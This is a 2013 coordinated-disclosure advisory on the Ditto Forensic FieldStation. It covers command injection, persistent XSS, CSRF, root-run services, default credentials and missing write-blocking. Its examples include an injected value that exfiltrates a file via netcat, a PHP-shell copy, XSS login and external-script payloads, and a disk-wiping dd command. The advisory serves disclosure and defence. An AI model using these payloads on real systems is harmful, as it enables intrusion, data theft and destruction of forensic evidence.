Skip to content
cyberexploits
webappphptext

Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities

Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities

Publié le 2013-12-17

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/30396.txt7eac4c3a
raw
**************************************************************

Title: Ditto Forensic FieldStation, multiple vulnerabilities

Versions affected: <= 2013Oct15a (all)

Vendor: CRU Wiebetech

Discovered by: Martin Wundram

Email: wundram@digitrace.de

Date found:     2013-04-22

Date published: 2013-12-12

Status: partially patched

**************************************************************





0] ======== Introduction / Background / Impact ========

In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one

essential requirement is that evidence data does not get modified at all (or 

not unnoticed, at least). Therefore IT forensic experts use write-blockers to 

ensure a read-only access to evidence data like hard disks or USB mass 

storage.



The Ditto Forensic FieldStation is such a special equipment (hardware with

embedded software) used by forensic experts to analyse and copy evidence data 

in a safe and secure way. The ditto is explicitly marketed as a device to 

acquire data from network file shares, too. This means it is meant to be 

connected to possibly hostile networks of suspects.



However it was found to be vulnerable up to the point of not being reliable as 

a computer forensic device.





1] ======== OS Command Injection ========

Class: Command Injection [CWE-77]

Impact: Code execution

Remotely Exploitable: Yes

CVE Name: CVE-2013-6881

CVSS v2 Base Score: 10

Overall CVSS v2 Score: 9.2

CVSS v2 Vector:

(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)



Several input fields of the web application are vulnerable to OS command

injection. E.g. the application allows the setting of parameters like 'sector

size' or 'skip count' for a forensic imaging task. Because of improper

neutralization in combination with the web server running with root 

privileges, an attacker is able to access and manipulate the complete system.



Example 1 (setting of 'sector size' = 1 with malicious content):



  1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666;



Example 2 (setting of 'set-size' = 1 with copying a PHP shell from

  the external SD card):



  1;cp /ditto/shell.php /opt/web/htdocs;





2] ======== Persistent XSS ========

Class: Cross-site Scripting [CWE-79]

Impact: Code execution

Remotely Exploitable: Yes

Status: unpatched

CVE Name: CVE-2013-6882

CVSS v2 Base Score: 9

Overall CVSS v2 Score (if patched): 9.2

CVSS v2 Vector:

(AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)

Overall CVSS v2 Score (unpatched): 10



The web application suffers from multiple vulnerabilities regarding XSS. The

first one (a) is critical because an unauthorized attacker is able to push

malicious code into the system and consequently attacking every user. The 

other ones (b) need authentication first.



a) The web application logs every login (including the username) in a not

sanitized way to a system log. Additionally, the web application embeds that

system log rendered as HTML into the start page of every user who successfully

logs in. Thus an unprivileged attacker can persistently inject malicious code

which attacks all users of the vulnerable system immediately after their 

login.



Example:

 

POSTDATA=

   user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

                           &pass=demo&login=Log+In





b) It is easily possible to submit malicious data as input into multiple HTML

form fields (e.g. one can force the system to load externally hosted 

JavaScript code with <script src=http://www.hacker.tld/code.js></script>). 

This can result in dangerous situations where the (external) JavaScript code 

mangles the information displayed about important computer forensic key values 

whose integrity is crucial.



Example: 

   784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone",

     "verify actions: yes" instead of "no", ...





3] ======== Cross-Site Request Forgery ========

Class: Cross-Site Request Forgery [CWE-352]

Impact: Application misuse

Remotely Exploitable: Yes

CVE Name: CVE-2013-6883

CVSS v2 Base Score: 6.6

Overall CVSS v2 Score: 8

CVSS v2 Vector:

(AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)



The web application is vulnerable to attacks using Cross-Site Request Forgery.

E.g. the disk erase technique (correct settings are important for the reliable

deletion of sensitive forensic data) can be changed with a simple POST 

request.





4] ======== Misconfigured Daemon Rights ========

Class: Configuration [CWE-16]

Impact: Full system access



The web server lighthttpd and the PHP engine are run as user 'root'. Thus

injection weaknesses in the 'ditto' web application result in immediate full

system access.





5] ======== Unneeded Daemons/Software ========

Class: Configuration [CWE-16]

Impact: Attackable services

Best matching CCE-ID: CCE-4268-9



Forensic usage needs only write-blocking and imaging of evidence data. 

However, the base system contains further active software and services. This 

helps attacking the system and escalating privileges. The tools/daemons are 

especially netcat and an active SSHd. Furthermore, the SSHd binds to the 

network port which is labeled as 'source' and thus intended for usage in 

supposedly hostile network environments - the network containing evidence data 

from suspects.





6] ======== Use of standard credentials ========

Class: Use of Hard-coded Credentials [CWE-798]

Impact: unwanted full system access

Remotely Exploitable: Yes

CVE Name: CVE-2013-6884

CVSS v2 Base Score: 10

Overall CVSS v2 Score: 9.2

CVSS v2 Vector:

(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)



The ditto write-blocker contains a default system user named 'ditto' with the

default password 'ditto' which is allowed to elevate its user rights to root

(sudo) without further authentication. In combination with the active SSHd, 

this vulnerability allows attackers full access to the ditto if it gets 

connected to the same/reachable network.





7] ======== Misconfigured Core System ========

Class: Configuration [CWE-16]

Impact: Alteration of evidence data

Remotely Exploitable: Yes



Although explicitly marketed as a hardware write-blocker, the ditto does not

implement any specific write-blocking mechanism at all. The underlying system 

is able to manipulate or even erase evidence on devices which are connected to 

the 'source side' of the ditto. The problem is: no hardware-level, no driver-

level and no kernel-level (blockdev) write-blocking are implemented. Only the 

web application prevents the user from writing to the source media. That is 

just security by obscurity. Finally, every critical weakness or simple 

malfunction in the web application can potentiallly lead to overwriting of 

source/evidence data. 



Furthermore, the embedded Linux system itself mounts the system partition as

writable. Thus malware could be persistently deployed!



Example:

  One can simply overwrite supposedly write-protected source data (USB stick 

and

SATA disk) with

     dd if=/dev/zero of=/dev/sda.





8] ======== Solution ========

Upgrade your ditto to the newest available firmware (2013Oct15a). Don't 

connect the device to potentially hostile networks. Examine your device if it 

has been manipulated at an earlier time (has someone placed a backdoor in the 

embedded Linux, or a malware which silently manipulates evidence data or 

copies of evidence data?).





9] ======== Report Timeline ========

2013-04-22 Discovery of vulnerabilities

2013-04-23 First contact with vendor including agreement about later public

           disclosure

2013-04-26 Detailed information about vulnerabilities provided to vendor

2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a

2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a

2013-11-26 Information with details provided to vendor about upcoming public

           disclosure. Vendor gave feedback regarding technical accuracy of

           this report

2013-12-12 Public disclosure





10] ======== Discussion ========

Because integrity is of utmost importance during the forensic process (correct

handling of evidence data and correct deduction of conclusions and

implications), even small vulnerabilities in forensic tools and devices become

critical.





11] ======== References ========

a)

http://www.cru-inc.com/support/software-downloads/ditto-firmware-

updates/ditto-firmware-release-notes-2013oct15a/

b)

http://www.cru-inc.com/support/software-downloads/ditto-firmware-

updates/ditto-firmware-release-notes-2013jun30a/





-- 

Diplom-Wirtschaftsinformatiker Martin G. Wundram



DigiTrace GmbH - Kompetenz in IT-Forensik

Geschäftsführer: Alexander Sigel, Martin Wundram

Registergericht Köln, HR B 72919

USt-IdNr: DE278529699



Zollstockgürtel 59, 50969 Köln

Telefon: 0221-6 77 86 95-0

Website: www.DigiTrace.de

E-Mail: info@DigiTrace.de
Voir sur GitHub